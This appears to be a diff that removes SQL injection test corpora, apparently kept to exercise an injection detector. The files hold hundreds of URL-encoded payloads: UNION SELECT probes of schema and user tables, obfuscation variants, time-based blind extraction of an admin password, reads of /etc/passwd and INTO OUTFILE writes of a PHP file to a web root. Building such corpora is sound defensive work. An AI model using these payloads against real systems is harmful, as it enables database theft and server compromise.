-1%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%20union%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20union
|
||||
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%23%0Aunion%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23union%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23feafafeas%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20%23feafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--eafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--eafafeas%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20union%28%20select%20id%20from%20users%20limit%201%2C1%29
|
||||
-1%20--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20table_name%20from%20users%20limit%201%2C1%29%29
|
||||
-1--%0A%20%28union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20all%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%23%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20select%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0Cselect%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0C%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%0C-%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1--%0D%0A%20union%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
|
||||
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27union%20select%20us3rs%20from%20table1
|
||||
%27-%40aa1-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40UNION1-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841-%40%D0%B0%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a1%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841-%40a%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2-%40a3%5E%40a3%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2-%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40a2%5E%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%27-%401%20union%20select%20us3rs%20from%20table1
|
||||
%27-%401%20union%20select%20us3rs%20from%20table1
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28select-table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29
|
||||
-1%20union%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29
|
||||
-1%20union%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
%27-%40a1%20union%20select%20us3rs%20from%20table1
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
#-1%23%0D%0A%23%20union%20%20%20%0D%0Aun%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
|
||||
-1%23%0D%0A%0D%0Aunion
|
||||
-1%23%0D%0A%0D%0Aunion%20%23
|
||||
-1%23%0D%0A%0D%0Aunion%20%23%0D%0A%23
|
||||
-1%23%0D%0Aunion%20%23%0D%0A%23
|
||||
-1%23union%20%23%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0Aunion
|
||||
#-1%23union%20%23%23%0D%0A---%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23unn%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0A/%2A%2A/union%23--%0D%0A%23rfae%0D%0A%23%23union
|
||||
-1%23union%20%23%23%0D%0A%23/%0D%0A/%2A%2A/union%23--
|
||||
-1%23union%20%23%23%0D%0A/1/%2A%2A/union%23--
|
||||
-11/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union%23--
|
||||
-1/1/%2A%2A/union%23--
|
||||
1/1/%2A%2A/union%23--
|
||||
-11/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
-1%0D%0A/1/%2A%2A/union%23
|
||||
-1%0D%0A/1/%2A%2A/union%23--
|
||||
-1%0D%0A/1/%2A%2A/union
|
||||
1/1/%2A%2A/union
|
||||
%0D%0A1/1/%2A%2A/union
|
||||
0-%0D%0A1/1/%2A%2A/union
|
||||
0x1-%0D%0A1/1/%2A%2A/union
|
||||
0x1%20-%0D%0A1/1/%2A%2A/union
|
||||
test%27-%0D%0A1/1/%2A%2A/union%20select
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
test%27-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
1-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
0-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
%27select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
%27-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
-1.select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
|
||||
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27%23
|
||||
%27%20into%20outfile%20%0D%0A%27/var/www/aa.php%27
|
||||
select%20load_file%28%27/asd/asd%27%29
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
|
||||
%27%20into%20outfile%20%27/var/www/aa.php
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
|
||||
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
|
||||
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20a%20from%20b
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
union%20%28select%20id%20from%20users%20limit%201%2C1%29
|
||||
1%20into%20outfile%20%27asd%27%0D%0A
|
||||
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
|
||||
%27union%20select%20
|
||||
%27union%20select
|
||||
%22union%20select
|
||||
1%20union%20select
|
||||
%40a%20union%20select
|
|
@ -1,4 +0,0 @@
|
|||
# various things for http://www-01.ibm.com/support/knowledgecenter/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm
|
||||
#
|
||||
UNION ALL SELECT FileToClob("/etc/passwd", "server")::html,0
|
||||
UNION ALL SELECT FileToBlob("/etc/passwd", "server")::html,0
|
|
@ -1,20 +0,0 @@
|
|||
# solar empire attack
|
||||
# http://www.exploit-db.com/exploits/4078/
|
||||
|
||||
# these use the multiple insert syntax
|
||||
# INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) ....
|
||||
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
|
||||
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
|
||||
# $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)"
|
||||
|
||||
F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# numeric version
|
||||
999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# arg switch
|
||||
F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
|
||||
# arg switch + numeric
|
||||
999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
|
||||
999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
|
|
@ -1,8 +0,0 @@
|
|||
# http://isc.sans.edu/diary.html?storyid=12127
|
||||
189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip----
|
||||
189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip----
|
||||
189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip----
|
||||
189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip----
|
||||
|
||||
# http://isc.sans.edu/diary.html?storyid=11011
|
||||
999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536--
|
|
@ -1,7 +0,0 @@
|
|||
#
|
||||
# Yong Deng reported 2016-10-20
|
||||
#
|
||||
# Tests that "left" is treated as a function
|
||||
#
|
||||
# http://www.w3resource.com/mysql/string-functions/mysql-left-function.php
|
||||
1'and left(database(),2)>'sa'--+
|
|
@ -1,640 +0,0 @@
|
|||
#
|
||||
# Misc collected attacks from the wild and beyond....
|
||||
#
|
||||
SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29
|
||||
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
|
||||
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
|
||||
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
|
||||
PHPX+AND+1%3D1+AND+XX%3DX
|
||||
PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX
|
||||
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27
|
||||
SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
|
||||
materials'%20and%201=1%20and%20''='
|
||||
materials'%20and%201=2%20and%20''='
|
||||
1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
|
||||
-999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x
|
||||
|
||||
# not sql
|
||||
#5000224%27%20UNION%20user_id%3E0--
|
||||
|
||||
-5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0//
|
||||
|
||||
# not sql
|
||||
#-5000224%27%20UNION%20user_id%3E0--
|
||||
5000224%27%20or%201=1--
|
||||
8+and+1=1--
|
||||
8+order+by+1--
|
||||
8-999.9+union+select+0
|
||||
9-999.9+union+select+0--
|
||||
6334588%00%27%7C%7CSLEEP%283%29%26%26%271
|
||||
6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29
|
||||
6334588%26%26SLEEP%283%29
|
||||
6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271
|
||||
6334588%27%20AND%20SLEEP%283%29%20AND%20%271
|
||||
6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35
|
||||
6444930%20%61%6E%64%20%36%3D%36
|
||||
6444930%27%20%61%6E%64%20%27%36%27%3D%27%35
|
||||
6444930%27%20%61%6E%64%20%27%36%27%3D%27%36
|
||||
FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045
|
||||
1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29
|
||||
1234.5%29+ORDER+BY+1
|
||||
FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29
|
||||
FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596
|
||||
FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29
|
||||
FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29
|
||||
FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29
|
||||
FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29
|
||||
FOO%29+AND+4499%3D8923%23
|
||||
FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29
|
||||
FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571
|
||||
FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350
|
||||
%28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29
|
||||
%28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29
|
||||
FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29
|
||||
%28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29
|
||||
FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B--
|
||||
FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410
|
||||
